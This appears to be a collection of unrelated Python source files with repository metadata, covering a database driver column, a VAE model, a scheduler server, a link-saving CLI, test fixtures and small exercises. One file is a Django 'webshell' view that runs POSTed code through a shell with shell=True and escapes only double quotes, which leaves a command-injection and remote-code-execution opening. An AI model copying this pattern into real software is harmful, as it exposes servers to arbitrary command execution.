from asynch.proto.columns.base import Column
from asynch.proto.io import BufferedReader, BufferedWriter
from asynch.proto.utils import compat
class String(Column):
ch_type = "String"
py_types = compat.string_types
null_value = ""
async def write_items(
self, items,
):
await self.writer.write_strings(items)
async def read_items(
self, n_items,
):
ret = []
for _ in range(n_items):
ret.append(await self.reader.read_str())
return tuple(ret)
class ByteString(String):
py_types = (bytes,)
null_value = b""
class FixedString(String):
ch_type = "FixedString"
def __init__(self, reader: BufferedReader, writer: BufferedWriter, length: int, **kwargs):
self.length = length
super().__init__(reader, writer, **kwargs)
class ByteFixedString(FixedString):
py_types = (bytearray, bytes)
null_value = b""
async def write_items(
self, items,
):
for item in items:
await self.writer.write_bytes(item)
def create_string_column(spec, column_options):
client_settings = column_options["context"].client_settings
strings_as_bytes = client_settings["strings_as_bytes"]
if spec == "String":
cls = ByteString if strings_as_bytes else String
return cls(**column_options)
    else:
        # FixedString(N): parse the declared byte length out of the spec
        # string, since FixedString.__init__ requires it
        length = int(spec[12:-1])
        cls = ByteFixedString if strings_as_bytes else FixedString
        return cls(length=length, **column_options)
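# --- Editor's note: hedged usage sketch ---
# create_string_column() is the factory the protocol layer is expected to call.
# The exact contents of column_options come from the caller, so the keys below
# (reader/writer/context) are assumptions based on the constructors above:
#
#   column_options = {'reader': reader, 'writer': writer, 'context': context}
#   col = create_string_column('String', column_options)
#   # -> ByteString when the client setting strings_as_bytes is true, else String
#   col = create_string_column('FixedString(8)', column_options)
#   # -> ByteFixedString or FixedString with length=8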
|
[
"long2ice@gmail.com"
] |
long2ice@gmail.com
|
74c123cca695e381f9917d8e47a426e387ac6de1
|
e2a2d471aeedf71d688e61689237b8cbea4997bf
|
/vae/vae.py
|
d3149c2b62ff1dadfdb0b0dec57f9abed1e723f0
|
[] |
no_license
|
Shadek07/WorldModel_VisualPushBlock
|
7ba03503f5c1d6f1eae7c4516e90d325e1a28f42
|
a12c13a0938aaa1ac6054f9f051848f1bf114f4d
|
refs/heads/master
| 2020-07-12T11:58:33.297560
| 2019-09-03T15:51:38
| 2019-09-03T15:51:38
| 204,815,078
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,747
|
py
|
# ConvVAE model
import numpy as np
import json
import tensorflow as tf
import os
import constants
from constants import IMAGE_H, IMAGE_W
from constants import SCREEN_Y, SCREEN_X
import pickle
import base64
def reset_graph():
if 'sess' in globals() and sess:
sess.close()
tf.reset_default_graph()
class ConvVAE(object):
def __init__(self, z_size=64, batch_size=1, learning_rate=0.0001, kl_tolerance=0.5, is_training=False, reuse=False, gpu_mode=False):
self.z_size = z_size
self.batch_size = batch_size
self.learning_rate = learning_rate
self.is_training = is_training
self.kl_tolerance = kl_tolerance
self.reuse = reuse
with tf.variable_scope('conv_vae', reuse=self.reuse):
if not gpu_mode:
with tf.device('/cpu:0'):
tf.logging.info('Model using cpu.')
print('called build_graph')
self._build_graph()
else:
tf.logging.info('Model using gpu.')
self._build_graph()
self._init_session()
def _build_graph(self):
self.g = tf.Graph()
with self.g.as_default():
self.x = tf.placeholder(tf.float32, shape=[None, IMAGE_W, IMAGE_H, 3])
#print('inside build graph')
# Encoder
h = tf.layers.conv2d(self.x, 32, 4, strides=2, activation=tf.nn.relu, name="enc_conv1")
#print('h32',h.shape)
h = tf.layers.conv2d(h, 64, 4, strides=2, activation=tf.nn.relu, name="enc_conv2")
#print('h64', h.shape)
h = tf.layers.conv2d(h, 128, 4, strides=2, activation=tf.nn.relu, name="enc_conv3")
#print('h128', h.shape)
h = tf.layers.conv2d(h, 256, 4, strides=2, activation=tf.nn.relu, name="enc_conv4")
#print('h256', h.shape)
#print('shpae',h.shape)
h = tf.reshape(h, [-1, 2*2*256]) #tf.reshape(h, [-1, 2*2*256]) #CHANGE here
#print('h_reshape', h.shape)
#InvalidArgumentError (see above for traceback): Input to reshape is a tensor with 2304 values, but the requested shape requires a multiple of 1024
# VAE
self.mu = tf.layers.dense(h, self.z_size, name="enc_fc_mu")
#print('mu:', self.mu.shape)
self.logvar = tf.layers.dense(h, self.z_size, name="enc_fc_log_var")
self.sigma = tf.exp(self.logvar / 2.0)
self.epsilon = tf.random_normal([self.batch_size, self.z_size])
self.z = self.mu + self.sigma * self.epsilon
#print('z:', self.z.shape)
# Decoder
h = tf.layers.dense(self.z, 4*256, name="dec_fc")
h = tf.reshape(h, [-1, 1, 1, 4*256])
#print('h_reshape', h.shape)
h = tf.layers.conv2d_transpose(h, 128, 5, strides=2, activation=tf.nn.relu, name="dec_deconv1")
#print('h128', h.shape)
h = tf.layers.conv2d_transpose(h, 64, 5, strides=2, activation=tf.nn.relu, name="dec_deconv2")
#print('h84', h.shape)
h = tf.layers.conv2d_transpose(h, 32, 6, strides=2, activation=tf.nn.relu, name="dec_deconv3")
#print('h32', h.shape)
self.y = tf.layers.conv2d_transpose(h, 3, 6, strides=2, activation=tf.nn.sigmoid, name="dec_deconv4")
#print('y: ', self.y.shape)
# train ops
if self.is_training:
self.global_step = tf.Variable(0, name='global_step', trainable=False)
eps = 1e-6 # avoid taking log of zero
# reconstruction loss
self.r_loss = tf.reduce_sum(
tf.square(self.x - self.y),
reduction_indices = [1,2,3]
)
self.r_loss = tf.reduce_mean(self.r_loss)
# augmented kl loss per dim
self.kl_loss = - 0.5 * tf.reduce_sum(
(1 + self.logvar - tf.square(self.mu) - tf.exp(self.logvar)),
reduction_indices = 1
)
self.kl_loss = tf.maximum(self.kl_loss, self.kl_tolerance * self.z_size)
print('kl_loss dim', self.kl_loss.shape)
self.kl_loss = tf.reduce_mean(self.kl_loss)
self.loss = self.r_loss + self.kl_loss
# training
self.lr = tf.Variable(self.learning_rate, trainable=False)
self.optimizer = tf.train.AdamOptimizer(self.lr)
grads = self.optimizer.compute_gradients(self.loss) # can potentially clip gradients here.
self.train_op = self.optimizer.apply_gradients(
grads, global_step=self.global_step, name='train_step')
# initialize vars
self.init = tf.global_variables_initializer()
t_vars = tf.trainable_variables()
self.assign_ops = {}
for var in t_vars:
#if var.name.startswith('conv_vae'):
pshape = var.get_shape()
pl = tf.placeholder(tf.float32, pshape, var.name[:-2]+'_placeholder')
assign_op = var.assign(pl)
self.assign_ops[var] = (assign_op, pl)
def _init_session(self):
"""Launch TensorFlow session and initialize variables"""
self.sess = tf.Session(graph=self.g)
self.sess.run(self.init)
def close_sess(self):
""" Close TensorFlow session """
self.sess.close()
def encode(self, x):
return self.sess.run(self.z, feed_dict={self.x: x})
def encode_mu_logvar(self, x):
(mu, logvar) = self.sess.run([self.mu, self.logvar], feed_dict={self.x: x})
return mu, logvar
def encode_mu_sigma(self, x):
(mu, sigma) = self.sess.run([self.mu, self.sigma], feed_dict={self.x: x})
return mu, sigma
def decode(self, z):
return self.sess.run(self.y, feed_dict={self.z: z})
def get_model_params(self):
# get trainable params.
model_names = []
model_params = []
model_shapes = []
with self.g.as_default():
t_vars = tf.trainable_variables()
for var in t_vars:
#if var.name.startswith('conv_vae'):
param_name = var.name
p = self.sess.run(var)
model_names.append(param_name)
params = np.round(p*10000).astype(np.int).tolist()
model_params.append(params)
model_shapes.append(p.shape)
return model_params, model_shapes, model_names
def get_model_params_with_name(self, names):
model_params = []
with self.g.as_default():
t_vars = tf.trainable_variables()
d = dict()
for var in t_vars:
d[var.name] = var
for name in names:
p = self.sess.run(d[name])
p = np.array(p)
p = p.ravel()
params = np.round(p * 10000).astype(np.int32)
'''bytes = base64.b64encode(params)
bstr = base64.b64encode(bytes)'''
#print(name, p.shape)
model_params.append(params)
f = open("carvae.js", "w")
f.write('var carvae_data=[')
for j,p in enumerate(model_params):
if j > 0:
f.write(", ")
f.write('[')
for i, q in enumerate(p):
if i > 0:
f.write(", ")
f.write(str(q))
f.write(']\n')
f.write('];\n')
return model_params
def get_random_model_params(self, stdev=0.5):
# get random params.
_, mshape, _ = self.get_model_params()
rparam = []
for s in mshape:
#rparam.append(np.random.randn(*s)*stdev)
rparam.append(np.random.standard_cauchy(s)*stdev) # spice things up
return rparam
def set_model_params(self, params):
with self.g.as_default():
t_vars = tf.trainable_variables()
idx = 0
for var in t_vars:
#if var.name.startswith('conv_vae'):
pshape = tuple(var.get_shape().as_list())
p = np.array(params[idx])
assert pshape == p.shape, "inconsistent shape"
assign_op, pl = self.assign_ops[var]
self.sess.run(assign_op, feed_dict={pl.name: p/10000.})
idx += 1
def load_json(self, jsonfile='vae.json'):
with open(jsonfile, 'r') as f:
params = json.load(f)
self.set_model_params(params)
def save_json(self, jsonfile='vae.json'):
model_params, model_shapes, model_names = self.get_model_params()
qparams = []
for p in model_params:
qparams.append(p)
with open(jsonfile, 'wt') as outfile:
json.dump(qparams, outfile, sort_keys=True, indent=0, separators=(',', ': '))
def set_random_params(self, stdev=0.5):
rparam = self.get_random_model_params(stdev)
self.set_model_params(rparam)
def save_model(self, model_save_path):
sess = self.sess
with self.g.as_default():
saver = tf.train.Saver(tf.global_variables())
checkpoint_path = os.path.join(model_save_path, 'vae')
tf.logging.info('saving model %s.', checkpoint_path)
saver.save(sess, checkpoint_path, 0) # just keep one
def load_checkpoint(self, checkpoint_path):
sess = self.sess
with self.g.as_default():
saver = tf.train.Saver(tf.global_variables())
ckpt = tf.train.get_checkpoint_state(checkpoint_path)
print('loading model', ckpt.model_checkpoint_path)
tf.logging.info('Loading model %s.', ckpt.model_checkpoint_path)
saver.restore(sess, ckpt.model_checkpoint_path)
|
[
"shadekcse07@gmail.com"
] |
shadekcse07@gmail.com
|
8307abd7d1d4335894813e096c0432b653ae323a
|
204bccf5d97ad228d9a19474cd4a24d9c08683f7
|
/mdmscheduler/server/server.py
|
cc505413b76d379d13d68a78f88c3ab82d0e227c
|
[
"BSD-2-Clause"
] |
permissive
|
Retailwhizz/mdm-scheduler
|
3a934a0bba57d7b5c8d8e53b1d218aff2c548e0c
|
52fa3721563f514236cd6596de27ad0f96f41f5f
|
refs/heads/master
| 2021-07-15T17:09:33.232419
| 2021-03-05T06:37:12
| 2021-03-05T06:37:12
| 79,448,567
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,776
|
py
|
"""Runs a tornado process to run scheduler daemon and provides REST API & web ui.
How to use:
SchedulerServer.run()
"""
import logging
import signal
import sys
import tornado
from mdmscheduler import settings
from mdmscheduler.core import scheduler_manager
from mdmscheduler.server.handlers import audit_logs
from mdmscheduler.server.handlers import executions
from mdmscheduler.server.handlers import index
from mdmscheduler.server.handlers import jobs
logger = logging.getLogger(__name__)
class SchedulerServer:
VERSION = 'v1'
singleton = None
def __init__(self, scheduler_instance):
# Start scheduler
self.scheduler_manager = scheduler_instance
self.tornado_settings = dict(
debug=settings.DEBUG,
static_path=settings.STATIC_DIR_PATH,
template_path=settings.TEMPLATE_DIR_PATH,
scheduler_manager=self.scheduler_manager
)
# Setup server
URLS = [
# Index page
(r'/', index.Handler),
# APIs
(r'/api/%s/jobs' % self.VERSION, jobs.Handler),
(r'/api/%s/jobs/(.*)' % self.VERSION, jobs.Handler),
(r'/api/%s/executions' % self.VERSION, executions.Handler),
(r'/api/%s/executions/(.*)' % self.VERSION, executions.Handler),
(r'/api/%s/logs' % self.VERSION, audit_logs.Handler),
]
self.application = tornado.web.Application(URLS, **self.tornado_settings)
def start_scheduler(self):
self.scheduler_manager.start()
self.post_scheduler_start()
def post_scheduler_start(self):
"""Implement this function to do things once scheduler starts"""
pass
def stop_scheduler(self):
self.scheduler_manager.stop()
self.post_scheduler_stop()
def post_scheduler_stop(self):
"""Implement this function to do things once scheduler stops"""
pass
@classmethod
def signal_handler(cls, signal, frame):
logger.info('Stopping scheduler ...')
cls.singleton.stop_scheduler()
logger.info('Done. Bye ~')
sys.exit(0)
@classmethod
def run(cls):
if not cls.singleton:
signal.signal(signal.SIGINT, cls.signal_handler)
cls.singleton = cls(scheduler_manager.SchedulerManager.get_instance())
cls.singleton.start_scheduler()
cls.singleton.application.listen(settings.HTTP_PORT, settings.HTTP_ADDRESS)
logger.info('Running server at %s:%d ...' % (settings.HTTP_ADDRESS, settings.HTTP_PORT))
logger.info('*** You can access scheduler web ui at http://localhost:%d'
' ***' % settings.HTTP_PORT)
tornado.ioloop.IOLoop.instance().start()
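# --- Editor's note: hedged usage sketch ---
# Per the module docstring, the entry point is SchedulerServer.run(). A subclass
# can override the post_* lifecycle hooks defined above; everything else below
# is illustrative:
#
#   class MyServer(SchedulerServer):
#       def post_scheduler_start(self):
#           logger.info('scheduler is up')
#   if __name__ == '__main__':
#       MyServer.run()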
|
[
"aibin@retailwhizz.com"
] |
aibin@retailwhizz.com
|
65c48e3536beca9173c620ffa26d3919c5b70a43
|
b7cd748798b2b6fab837a227624eb9fe7ebec1c8
|
/src/notelink/main.py
|
17620ce4677bb31e44a6784fbebfacd34640f85f
|
[
"MIT"
] |
permissive
|
agung96tm/notelink
|
c9314e82c3d976bfb93930eb2293fe15564a8f3d
|
a0adf49254265a7a5e74edf97b0fa5f293302a0c
|
refs/heads/main
| 2023-05-10T14:49:58.294378
| 2021-06-13T15:46:21
| 2021-06-13T15:46:21
| 376,555,336
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,228
|
py
|
from typing import Union, List
import click
from notelink.promps.list import (
ask_to_choose_hostname,
ask_to_choose_action,
ask_to_choose_hostname_with_action,
)
from notelink.promps.search import ask_for_search_action
from notelink.core import NoteMe, ensure_config
from notelink.core import helpers
@click.group()
@click.pass_context
def cli(ctx):
ctx.obj = NoteMe()
ensure_config(ctx.obj.config)
@cli.command()
@click.argument('link', nargs=-1)
@click.pass_obj
def nsave(note_me: NoteMe, link: Union[str, List[str]]) -> None:
note_me.bulk_save(link)
@cli.command()
@click.option('--list-host', is_flag=True)
@click.option('--reverse/--no-reverse', default=False)
@click.option('-h', '--hostname', type=str)
@click.pass_obj
def nlist(note_me: NoteMe, list_host: bool, reverse: bool, hostname: str) -> None:
if list_host:
link_chosen, action = ask_to_choose_hostname_with_action(note_me, reverse)
if not link_chosen:
            click.echo('hostname is empty')
return
helpers.helper_for_hostname_action(note_me=note_me, link_chosen=link_chosen, action=action)
else:
hostname_ = ask_to_choose_hostname(note_me, reverse) if not hostname else hostname
if note_me.is_empty_list_for(hostname_):
if hostname_:
click.echo(f'link for hostname "{hostname_}" is empty')
else:
                click.echo('hostname is empty')
return
link_chosen, action = ask_to_choose_action(note_me, hostname_)
helpers.helper_for_action(note_me=note_me, link_chosen=link_chosen, action=action)
@cli.command()
@click.argument('search', type=str)
@click.option('-l', '--limit', type=int)
@click.option('-h', '--hostname', type=str)
@click.pass_obj
def nsearch(note_me: NoteMe, search: str, limit: int, hostname: str) -> None:
list_links = note_me.search(search_value=search, limit=limit, hostname=hostname)
if len(list_links) == 0:
        click.echo('Your search did not find anything')
return
link_chosen, action = ask_for_search_action(list_links)
helpers.helper_for_action(note_me=note_me, link_chosen=link_chosen, action=action)
if __name__ == '__main__':
cli()
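# --- Editor's note: hedged usage sketch ---
# Example invocations of the click group above, assuming the package exposes
# `cli` as a console script named `notelink` (the entry-point name is an
# assumption):
#
#   notelink nsave https://example.com/article
#   notelink nlist --list-host --reverse
#   notelink nsearch django --limit 5 -h example.com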
|
[
"agung.96tm@gmail.com"
] |
agung.96tm@gmail.com
|
a9df98d869d092be6ca5d2b0786db96248d959ac
|
15276b46ad1155d0c25f432f22a0562c0ec32768
|
/webserver/webserver.py
|
4d03f0e701d85f742df85767d953ae97375bf949
|
[] |
no_license
|
Zanobos/macloc
|
c81cd6f1cdb31d13ba80a8aebc93b73ca5be9b94
|
e98eefe58b309f2d09acad78f70551120222485f
|
refs/heads/master
| 2022-12-09T23:40:44.252130
| 2019-08-24T08:01:08
| 2019-08-24T08:01:08
| 145,012,464
| 0
| 0
| null | 2022-12-08T10:12:20
| 2018-08-16T16:18:49
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 482
|
py
|
from app import create_app, db, socketio
from app.models import Wall, Climb, User, Hold, HistoricHold, HistoricWall, Record
app = create_app()
if __name__ == '__main__':
socketio.run(app)
@app.shell_context_processor
def make_shell_context():
return {
'db': db,
'Wall': Wall,
'Climb': Climb,
'User': User,
'Hold': Hold,
'HistoricWall': HistoricWall,
'HistoricHold': HistoricHold,
'Record': Record
}
|
[
"a.zanotti@reply.it"
] |
a.zanotti@reply.it
|
679b80cdabd7d1b0f0f943061fd38fd8e06f77c2
|
cd8b95dac290a7c638e1ea5bbbbcdbf6c114c1e4
|
/tests/e2e/fixtures/feast_services.py
|
ce7f854691700650fc8e048b938acaa4134aee63
|
[
"Apache-2.0"
] |
permissive
|
DaoCalendar/feast
|
ceb8bd136a912ba13860ddf44a75f3cf2d6103ed
|
c8fca7b767e54e5211dca3bc4851864cd30899e0
|
refs/heads/master
| 2023-01-01T16:16:55.410038
| 2020-10-30T10:54:34
| 2020-10-30T10:54:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,588
|
py
|
import os
import shutil
import socket
import subprocess
import tempfile
import time
from typing import Any, Dict
import pytest
import yaml
from pytest_postgresql.executor import PostgreSQLExecutor
from pytest_redis.executor import RedisExecutor
__all__ = (
"feast_core",
"feast_serving",
"enable_auth",
)
def _start_jar(jar, options=None) -> subprocess.Popen:
if not os.path.isfile(jar):
raise ValueError(f"{jar} doesn't exist")
cmd = [shutil.which("java"), "-jar", jar]
if options:
cmd.extend(options)
return subprocess.Popen(cmd) # type: ignore
def _wait_port_open(port, max_wait=60):
print(f"Waiting for port {port}")
start = time.time()
while True:
try:
socket.create_connection(("localhost", port), timeout=1)
except OSError:
if time.time() - start > max_wait:
raise
time.sleep(1)
else:
return
@pytest.fixture(scope="session", params=[True, False])
def enable_auth(request):
return request.param
@pytest.fixture(scope="session")
def feast_core(
project_root, project_version, enable_auth, postgres_server: PostgreSQLExecutor
):
jar = str(
project_root / "core" / "target" / f"feast-core-{project_version}-exec.jar"
)
config = dict(
feast=dict(
security=dict(
enabled=enable_auth,
provider="jwt",
options=dict(
jwkEndpointURI="https://www.googleapis.com/oauth2/v3/certs"
),
)
),
spring=dict(
datasource=dict(
url=f"jdbc:postgresql://{postgres_server.host}:{postgres_server.port}/postgres"
)
),
)
with tempfile.NamedTemporaryFile(suffix=".yaml", mode="w+") as config_file:
yaml.dump(config, config_file)
config_file.flush()
process = _start_jar(
jar,
[
f"--spring.config.location=classpath:/application.yml,file://{config_file.name}"
],
)
_wait_port_open(6565)
yield "localhost", 6565
process.terminate()
@pytest.fixture(scope="session")
def feast_serving(
project_root,
project_version,
enable_auth,
redis_server: RedisExecutor,
feast_core,
pytestconfig,
):
jar = str(
project_root
/ "serving"
/ "target"
/ f"feast-serving-{project_version}-exec.jar"
)
if pytestconfig.getoption("redis_cluster"):
store: Dict[str, Any] = dict(
name="online",
type="REDIS_CLUSTER",
config=dict(connection_string=f"{redis_server.host}:{redis_server.port}"),
)
else:
store = dict(
name="online",
type="REDIS",
config=dict(host=redis_server.host, port=redis_server.port),
)
config = dict(
feast=dict(
stores=[store],
coreAuthentication=dict(enabled=enable_auth, provider="google"),
security=dict(authentication=dict(enabled=enable_auth, provider="jwt")),
)
)
with tempfile.NamedTemporaryFile(suffix=".yaml", mode="w+") as config_file:
yaml.dump(config, config_file)
config_file.flush()
process = _start_jar(
jar,
[
f"--spring.config.location=classpath:/application.yml,file://{config_file.name}"
],
)
_wait_port_open(6566)
yield "localhost", 6566
process.terminate()
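# --- Editor's note: hedged usage sketch ---
# These session-scoped fixtures compose, so a test module can simply request
# them by name; the test body below is illustrative:
#
#   def test_core_is_reachable(feast_core):
#       host, port = feast_core
#       assert (host, port) == ('localhost', 6565)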
|
[
"noreply@github.com"
] |
DaoCalendar.noreply@github.com
|
497f4c82a57b7a113a2407a042eb8ced9fa93964
|
b807d05f7af7430a1545330152681a4b7fad7f1f
|
/Python/Intersection_of_Two_Arrays.py
|
ed9b3cfe64706c1d82b8378aaaa10b1753c13eda
|
[] |
no_license
|
SuryankDixit/LeetCode_Algorithms
|
51578f39766f0cde9977f8f07166ace92a873512
|
63e1694c1746072d55fcec55240a3de74c930094
|
refs/heads/main
| 2022-12-31T08:58:30.419769
| 2020-10-20T14:36:00
| 2020-10-20T14:36:00
| 305,772,219
| 3
| 0
| null | 2020-10-20T16:40:29
| 2020-10-20T16:40:28
| null |
UTF-8
|
Python
| false
| false
| 204
|
py
|
from typing import List
class Solution:
def intersection(self, nums1: List[int], nums2: List[int]) -> List[int]:
result = set.intersection(set(nums1), set(nums2))
return list(result)
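# Editor's addition: a quick sanity check of the set-based intersection.
if __name__ == '__main__':
    print(Solution().intersection([1, 2, 2, 1], [2, 2]))  # -> [2]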
|
[
"melvinredvirus@gmail.com"
] |
melvinredvirus@gmail.com
|
2cfd479123fb0555b468d1854cef87480d0b0289
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/Kivy/my_kivy_project/lib/python3.8/site-packages/coverage/config.py
|
88abdd1fd344823ce70ec6953b0a6f5dad3b2769
|
[] |
no_license
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137
| 2023-08-28T23:50:57
| 2023-08-28T23:50:57
| 267,368,545
| 2
| 1
| null | 2022-09-08T15:20:18
| 2020-05-27T16:18:17
| null |
UTF-8
|
Python
| false
| false
| 130
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:b8d5580bba47dfe77ecc21f4846584e5574caf8bdc76c0a4a1d5246b33d71ce8
size 18952
|
[
"nateweiler84@gmail.com"
] |
nateweiler84@gmail.com
|
0fffcd550675c32d1c9aa19cea0ce552b9414efe
|
3db48e7c13b330af7c488820d14d22edf0a7cfda
|
/DP/[8-2]개미 전사.py
|
dd4e34ae56023949d50597545c8f35bc626840b0
|
[] |
no_license
|
kim-kiwon/Coding-test
|
1555d7e7699a21655e86f892e76f784accf4b9cc
|
aa8563ab54596c9c6dace84494d4f68fbd8e97f4
|
refs/heads/master
| 2023-04-01T10:04:11.152485
| 2021-04-05T10:17:51
| 2021-04-05T10:17:51
| 328,202,195
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 201
|
py
|
n = int(input())
arr = [0] + list(map(int, input().split()))
dp = [0] * (n+1)
dp[1] = arr[1]
dp[2] = max(arr[1], arr[2])
for i in range(3, n+1):
dp[i] = max(arr[i]+dp[i-2], dp[i-1])
print(dp[n])
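# Editor's note on the recurrence: dp[i] is the best loot from the first i
# storages; at storage i the ant either skips it (dp[i-1]) or raids it plus the
# best of the first i-2 (arr[i] + dp[i-2]). For example, the input
#   4
#   1 3 1 5
# gives dp = [0, 1, 3, 3, 8] and prints 8.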
|
[
"kimkiwonn@gmail.com"
] |
kimkiwonn@gmail.com
|
b618f6884d24363fdb9831823979ce74a14c34c9
|
baa8387f014c08f5c9879c93d33befdb40b16573
|
/apps/naim/main.py
|
253a7845cbec4f22afdaf3026efb7ae2a2747593
|
[] |
no_license
|
nmlorg/nmlorg.github.io
|
f72c1c63db355a40aa353ae0b811bbc27cd8b9a6
|
cc7f5b9001a7435e9bf7e2662fff2ceeef5a72a3
|
refs/heads/master
| 2020-04-15T23:48:53.806689
| 2019-03-02T03:53:11
| 2019-03-02T03:53:11
| 32,093,297
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 392
|
py
|
# Copyright 2015 Daniel Reed <n@ml.org>
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
class Redirect(webapp.RequestHandler):
def get(self):
self.redirect('https://nmlorg.github.io/naim/')
app = webapp.WSGIApplication([
('/.*', Redirect),
], debug=True)
def main():
run_wsgi_app(app)
if __name__ == '__main__':
main()
|
[
"n@ml.org"
] |
n@ml.org
|
d1f37dedd61aa33d8ff33c30cb55836c20ce2f68
|
09e57dd1374713f06b70d7b37a580130d9bbab0d
|
/benchmark/startPyquil555.py
|
67f8d230406876219e0b959392ccd8343d614971
|
[
"BSD-3-Clause"
] |
permissive
|
UCLA-SEAL/QDiff
|
ad53650034897abb5941e74539e3aee8edb600ab
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
refs/heads/main
| 2023-08-05T04:52:24.961998
| 2021-09-19T02:56:16
| 2021-09-19T02:56:16
| 405,159,939
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,152
|
py
|
# qubit number=4
# total number=12
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
prog = Program() # circuit begin
prog += H(1) # number=2
prog += H(2) # number=3
prog += H(3) # number=4
prog += Y(3) # number=5
prog += SWAP(1,0) # number=6
prog += Y(2) # number=8
prog += Y(2) # number=9
prog += X(3) # number=10
prog += X(3) # number=11
# circuit end
return prog
def summarise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('4q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil555.csv","w")
    print(summarise_results(bitstrings), file=writefile)
writefile.close()
|
[
"wangjiyuan123@yeah.net"
] |
wangjiyuan123@yeah.net
|
a8e25837ac8c8efd2530bfb9d16247010fed92d9
|
9ba36e3d9132f812d437f9bc820a54724f1ea831
|
/webshell/views.py
|
55c2ac1d9ffd4380b3526f2bef2bcf178e039105
|
[
"MIT"
] |
permissive
|
MarkTseng/django-webshell
|
498c87c62eb9389cf05c1279bc7415703f662070
|
c32a089cefae95cddda63a0f086c976e318ba35d
|
refs/heads/master
| 2021-01-21T16:04:03.264661
| 2014-08-06T09:31:44
| 2014-08-06T09:31:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 849
|
py
|
from subprocess import Popen, PIPE
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from django.contrib.auth.decorators import permission_required
from pygments import highlight
from pygments.lexers import get_lexer_by_name
from pygments.formatters import HtmlFormatter
@csrf_exempt
@require_POST
@permission_required('is_superuser')
def execute_script_view(request):
source = request.POST.get('source', '').replace('"', r'\"')
proc = Popen('python -c "%s"' % source, shell=True, stdout=PIPE, stderr=PIPE)
out, err = proc.communicate()
lexer = get_lexer_by_name('pytb', stripall=True)
formatter = HtmlFormatter(linenos=True, cssclass='source')
result = highlight(out or err, lexer, formatter)
return HttpResponse(result)
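# --- Editor's note: hedged usage sketch ---
# The view expects a superuser POST with a `source` field and returns the
# Pygments-highlighted stdout (or traceback). URL routing lives outside this
# file, so the path below is an assumption:
#
#   curl -X POST -d 'source=print("hi")' http://localhost:8000/webshell/execute/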
|
[
"and@rey.im"
] |
and@rey.im
|
8d9613ae4ac31c20991c2487eb559bf3857767eb
|
be8508072a73ab79b9678bdf28d944cc2e2f87f1
|
/spock.py
|
3b8a8fa5eb2ebb60dc2d08773fa35701094f146e
|
[] |
no_license
|
colingalvin/RPSLSPython
|
0a351498f8ef66ed7ede925714d55986e54731ec
|
c313d38b8ddab46b2b87ccc5c4148e2f3a36a470
|
refs/heads/main
| 2023-01-13T05:26:52.460513
| 2020-11-10T21:24:20
| 2020-11-10T21:24:20
| 311,762,333
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 285
|
py
|
from gesture import Gesture
class Spock(Gesture):
def __init__(self):
self.name = "Spock"
self.can_beat_rock = True
self.can_beat_paper = False
self.can_beat_scissors = True
self.can_beat_lizard = False
self.can_beat_spock = False
|
[
"colingalvin@ymail.com"
] |
colingalvin@ymail.com
|
c61c0d76286653ca49a74c2488c37db97b7b2ee3
|
dd58a1f2be0617eb8d167c8f5bd51b62879e0b53
|
/tubers/webpages/models.py
|
9b86f86299160880ac468cc2ac0a349aefaf3bdd
|
[] |
no_license
|
NerdyCoder-AJ/Tubers
|
6421808f33491de6bcd7abac01c9ad68799a862e
|
b7a637f6f2573b31aac11ad3a93975c1aa002805
|
refs/heads/master
| 2023-05-27T16:17:19.159407
| 2021-06-11T02:19:10
| 2021-06-11T02:19:10
| 372,412,000
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 785
|
py
|
from django.db import models
from django.db.models.fields import DateTimeField
# Create your models here.
class Team(models.Model):
first_name = models.CharField(max_length=200)
last_name = models.CharField(max_length=200)
role = models.CharField(max_length=200)
fb_link = models.CharField(max_length=200)
insta_link = models.CharField(max_length=200)
photo = models.ImageField(upload_to='media/team/%Y/%m/%d/')
    created_date = DateTimeField(auto_now_add=True)
class Slider(models.Model):
headline = models.CharField(max_length=255)
subtitle = models.CharField(max_length=255)
button_text = models.CharField(max_length=255)
photo = models.ImageField(upload_to='media/slider/%y/')
created_date = models.DateTimeField(auto_now_add=True)
|
[
"akash.codeway@gmail.com"
] |
akash.codeway@gmail.com
|
b191f1b78146aef2f3c456ec36080ade1f859998
|
4f2ddf4f26aa9c2024a54bf30e5fd54c0b377949
|
/RedAnt_2018/RedAnt/file/urls.py
|
278e4babb8978e949ab1602aceb804a58799e161
|
[] |
no_license
|
grapefruitNanM/-2017
|
2803edcb7eb02fda0f137d37204378cbe76d6500
|
81d896b31eab42080fe559064455c01c527ec042
|
refs/heads/master
| 2020-03-29T05:32:47.850475
| 2018-09-20T09:56:08
| 2018-09-20T09:56:08
| 149,586,766
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 124
|
py
|
from django.conf.urls import url
import RedAnt.file.views as views
urlpatterns = [
url(r'', views.getFile),
]
|
[
"1074516814@qq.com"
] |
1074516814@qq.com
|
